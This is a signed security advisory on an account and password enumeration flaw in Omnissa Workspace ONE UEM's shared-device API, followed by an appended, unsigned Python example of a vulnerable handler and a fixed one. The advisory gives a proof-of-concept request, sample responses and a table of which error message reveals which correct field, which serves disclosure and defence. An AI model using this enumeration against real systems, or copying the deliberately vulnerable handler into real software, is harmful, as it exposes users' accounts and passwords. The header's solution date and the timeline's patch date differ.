-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID:               SYSS-2025-047
Product:                   Workspace ONE UEM
Manufacturer:              Omnissa
Affected Version(s):       24.6.0.21
Tested Version(s):         24.6.0.21
Vulnerability Type:        Observable Response Discrepancy (CWE-204)
Risk Level:                High
Solution Status:           Fixed
Manufacturer Notification: 2025-07-18
Solution Date:             2025-11-12
Public Disclosure:         2026-02-13
CVE Reference:             CVE-2025-25236
Author of Advisory:        Philipp Buchegger, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Omnissa Workspace ONE is software for managing endpoint devices.

The manufacturer describes the product as follows (see [1]):

"Manage, secure and monitor all devices across all platforms. [...]
With Omnissa Workspace ONE®, your organization can ease the operational
burden on your IT workforce via an autonomous workspace, freeing them to
focus on higher-value tasks."

Due to an internet-exposed API with missing security features, it is
possible to enumerate customer-specific sensitive information such as
tenant IDs, user accounts, or user passwords.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

During testing, no rate limit, account lockout, or logging concerning
the internet-exposed API were found.

The vulnerable endpoint was detected by installing a custom certificate
authority during the enrollment process of an Apple mobile device. It is
used for authenticating the mobile application hub in a shared device
scenario.

The required parameter for the attack, "DeviceIdentifier", has the
format 00001234-0001A2B3C4D4E6F7. It could in principle be brute-forced,
but this is rather unrealistic. However, as soon as a valid device
identifier is known, the parameters "GroupCode", "Username" and
"Password" can be enumerated separately, because the web service answers
each failing field with a different error message.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following HTTP POST request can be used for enumerating usernames:

POST /DeviceServices/awmdmsdk/v3/shareddevice/checkout/authenticate HTTP/1.1
Host:
Content-Type: application/json
Accept: */*
Connection: keep-alive
Accept-Language: de-DE
Content-Length:
Accept-Encoding: gzip, deflate, br
User-Agent: Hub/4444 CFNetwork/3826.500.131 Darwin/24.5.0

{"DeviceIdentifier":"","GroupCode":"","Password":"","AuthenticationGroup":"com.air-watch.agent","Username":"","BundleId":"com.air-watch.agent","DeviceType":2}

The corresponding HTTP response is as follows:

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
X-Correlation-ID: 1caf0110-cafe-cafe-1234-cafe1234cafe
x-aw-version: 24.6.0.21
Date: Tue, 15 Jul 2025 13:14:03 GMT
Content-Length: 390

{"Status":10,"Message":"Ihr Konto kann nicht registriert werden. Wenden Sie sich bitte an Ihren Systemadministrator.","AWHMACKey":null,"AWAuthenticationToken":null,"EulaContentId":0,"EulaContent":null,"SharedDevicePasscodeExpirationTime":"\/Date(-62135596800000)\/","SharedDevicePasscodeForcedChangeTime":"\/Date(-62135596800000)\/","TransactionIdentifier":null,"ClearAppDataOnLogOut":null}

An example of an HTTP response used for device identifier enumeration is
as follows:

HTTP/1.1 400 Bad Request
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
X-Correlation-ID: 4f31b05c-f975-467b-b134-24b1d447510d
x-aw-version: 24.6.0.21
Date: Tue, 15 Jul 2025 13:14:58 GMT
Content-Length: 0

If the group code is incorrect, the error message is "Ungültige
Gruppen-ID. Bitte versuchen Sie es erneut." If it is correct, but the
other values are incorrect, the error message is "Ihr Konto kann nicht
registriert werden. Wenden Sie sich bitte an Ihren Systemadministrator."

If the user account does not exist, the message is "Ihr Konto kann nicht
registriert werden."; if the account exists but the password is wrong,
the message changes to "Ungültige Benutzeranmeldedaten". If both username
and password are correct, the response is "Failed to CheckOut. Device
already checked out."

These differences in the response behavior of the web service can be
used for enumeration purposes in the following way:

"Ungültige Gruppen-ID. Bitte versuchen Sie es erneut."
  => Group code is wrong.

"Ihr Konto kann nicht registriert werden. Wenden Sie sich bitte an Ihren
Systemadministrator."
  => Group code checks out.

"Ihr Konto kann nicht registriert werden"
  => Username is wrong.

"Ungültige Benutzeranmeldedaten"
  => Username checks out, password is incorrect.

"Failed to CheckOut. Device already checked out."
  => All fields are correct.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Only return a single, generic error message that does not depend on
which check failed.

See https://www.omnissa.com/omsa-2025-0005

More information:
https://en.wikipedia.org/wiki/Oracle_attack

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2025-07-15: Vulnerability discovered
2025-07-18: Vulnerability reported to manufacturer
2025-09-10: Patch released by manufacturer
2026-02-13: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Omnissa Workspace ONE for Unified Endpoint
    Management
    https://go.omnissa.com/Workspace-ONE-for-UEM
[2] SySS Security Advisory SYSS-2025-047
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-047.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Philipp Buchegger and
Sebastian Auwärter of SySS GmbH.
E-Mail: philipp.buchegger@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Philipp_Buchegger.asc
Key ID: 0x065809F0BB6747E8
Key Fingerprint: 489F 34EE FA88 27DE 69A0 756B 0658 09F0 BB67 47E8

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS
website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 4.0
URL: https://creativecommons.org/licenses/by/4.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEESJ807vqIJ95poHVrBlgJ8LtnR+gFAmmPHUQACgkQBlgJ8Ltn
R+ghmQ/7BZV19/Mbi9C3i2wc5HT9pHEx8/Th7bxFxwQOgrhEhFYCAPxNU7MnHQw5
LmBevLwT+wjrWbb8Ta30L68W0j80cJyaFq0xAjeGU7l2zuRHtiCHfpqRkAjlBohn
ZLH99xxB4vNCqyh4G0m6fQ18YBSgWV8/z07caJ5e8uzrP4iqXv7x+5m7FXwjp+R6
ryUgOxPAmXxGbG5kk/kIod+xevUg4ZIW9+IdJLRNcfLup5xshZ6PZvz1lSJBelYJ
iva7o1QHNaIYUJbGEFzKOmq72eGq/3r+iAiR9hWc9xvl807szViSw9NzIZiONpHZ
fuPRsyewxsb93x3PDAafMkNpHpytq6lnHwJQKwjmTu7UMl8vxDlvO1+vRRuJHeav
nna8GMVMcQZkf2B1n2UvO8+h1VXnkwreahNaIxZUPKWdRvuWG2a4gqfPhiN2tXSK
CpkmhA2auNMqlqHMXL8XpKc8KQjkmQJyFOyiQsMR+n0FiZjaB9DbFp/WnoKS1Xpp
70qx2VHXGyqv8Z54xiedfmdLwfWQHLfW/hMbI0wirVGEPe95pTRoNsNC+vBSaLKl
0k5mFyypH0JsKwPMOJz1YRwOzT/HeB33i1dK7JLVG/Sp4atsLz2dZi5gv6iu1oDq
pY4UCjiicGvcGVjJr3bU4dL6qAvXK0zh3UuI6PjdaOGZmYfkCxk=
=Ot2P
-----END PGP SIGNATURE-----
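Editor's added example, illustrating the Solution section of the advisory above. This is not part of the signed advisory and not Omnissa's code: it is a minimal stand-in for a shared-device check-out authentication handler, written to show the CWE-204 pattern the advisory describes next to the fix it recommends. The function names (`authenticate_vulnerable`, `authenticate_hardened`, `is_oracle_free`), the tenant data, the generic failure message and the `LOCKOUT_THRESHOLD` policy value are all constructed assumptions; only the quoted error messages come from the advisory. The hardened handler also adds the logging and lockout that the Vulnerability Details section notes were absent, and hashes a dummy value for unknown users so that response timing does not become a second oracle.

```python
"""Added example, not Omnissa's code: a minimal shared-device check-out
authentication handler that reproduces the CWE-204 pattern described in
the advisory and the fix it recommends. Tenant data, group codes, user
accounts, the generic message and the lockout policy are constructed;
the quoted messages are the ones from the advisory."""

import hashlib
import hmac
import logging
from collections import defaultdict

log = logging.getLogger("shareddevice-auth")

# Messages quoted in the advisory; each one reveals which check failed.
MSG_BAD_GROUP = "Ungültige Gruppen-ID. Bitte versuchen Sie es erneut."
MSG_NO_ACCOUNT = ("Ihr Konto kann nicht registriert werden. "
                  "Wenden Sie sich bitte an Ihren Systemadministrator.")
MSG_BAD_CREDS = "Ungültige Benutzeranmeldedaten"
MSG_CHECKED_OUT = "Failed to CheckOut. Device already checked out."
MSG_GENERIC = "Authentication failed."   # constructed, error-independent

LOCKOUT_THRESHOLD = 5                    # constructed policy value


def _hash(password: str) -> bytes:
    """Fixed-cost password hash (constructed salt, example only)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(),
                               b"constructed-salt", 50_000)


# Constructed tenant: one group code and one enrolled user.
TENANT = {
    "group_code": "EXAMPLE-GROUP",
    "users": {"alice": _hash("correct horse battery staple")},
}
DUMMY_HASH = _hash("dummy")              # compared when the user is unknown

_failures = defaultdict(int)             # failed attempts per DeviceIdentifier


def authenticate_vulnerable(device_id, group_code, username, password):
    """Pattern from the advisory: a different message for each failing
    field, no logging, no lockout. device_id is ignored."""
    if group_code != TENANT["group_code"]:
        return {"ok": False, "Message": MSG_BAD_GROUP}
    stored = TENANT["users"].get(username)
    if stored is None:
        return {"ok": False, "Message": MSG_NO_ACCOUNT}
    if not hmac.compare_digest(stored, _hash(password)):
        return {"ok": False, "Message": MSG_BAD_CREDS}
    return {"ok": True, "Message": MSG_CHECKED_OUT}


def authenticate_hardened(device_id, group_code, username, password):
    """Fix per the advisory's solution: evaluate every field, return one
    generic message on any failure, log the attempt, and lock the device
    identifier after LOCKOUT_THRESHOLD failures."""
    if _failures[device_id] >= LOCKOUT_THRESHOLD:
        log.warning("locked out device=%s", device_id)
        return {"ok": False, "Message": MSG_GENERIC}
    ok_group = hmac.compare_digest(group_code.encode(),
                                   TENANT["group_code"].encode())
    # Hash and compare even for unknown users so that response time does
    # not reveal whether the account exists.
    stored = TENANT["users"].get(username, DUMMY_HASH)
    ok_user = (hmac.compare_digest(stored, _hash(password))
               and username in TENANT["users"])
    if not (ok_group and ok_user):
        _failures[device_id] += 1
        log.warning("auth failure device=%s attempts=%d",
                    device_id, _failures[device_id])
        return {"ok": False, "Message": MSG_GENERIC}
    _failures.pop(device_id, None)
    return {"ok": True, "Message": MSG_CHECKED_OUT}


def is_oracle_free(handler, device_id="probe-device"):
    """True when the three failure cases listed in the advisory (wrong
    group code, unknown user, wrong password) yield identical responses."""
    cases = [
        ("WRONG-GROUP", "alice", "correct horse battery staple"),
        ("EXAMPLE-GROUP", "mallory", "whatever"),
        ("EXAMPLE-GROUP", "alice", "wrong password"),
    ]
    bodies = [handler(device_id, *c) for c in cases]
    return all(b == bodies[0] for b in bodies)


if __name__ == "__main__":
    print("vulnerable handler oracle-free:", is_oracle_free(authenticate_vulnerable))
    print("hardened handler oracle-free:  ", is_oracle_free(authenticate_hardened))
```

`is_oracle_free` is the check a reviewer can keep in a test suite: it exercises each failing field separately and fails the build as soon as any two failure responses differ, which is exactly the discrepancy the advisory's enumeration table relies on.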